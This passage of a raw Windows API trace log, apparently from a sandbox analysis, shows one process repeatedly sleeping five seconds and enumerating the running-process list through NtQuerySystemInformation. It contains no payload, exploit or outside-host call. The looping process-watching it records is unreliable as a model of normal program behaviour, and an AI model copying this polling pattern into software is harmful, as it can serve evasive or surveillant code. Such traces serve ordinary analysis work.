FreeType=0x8000) returned 0x0 [0220.834] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 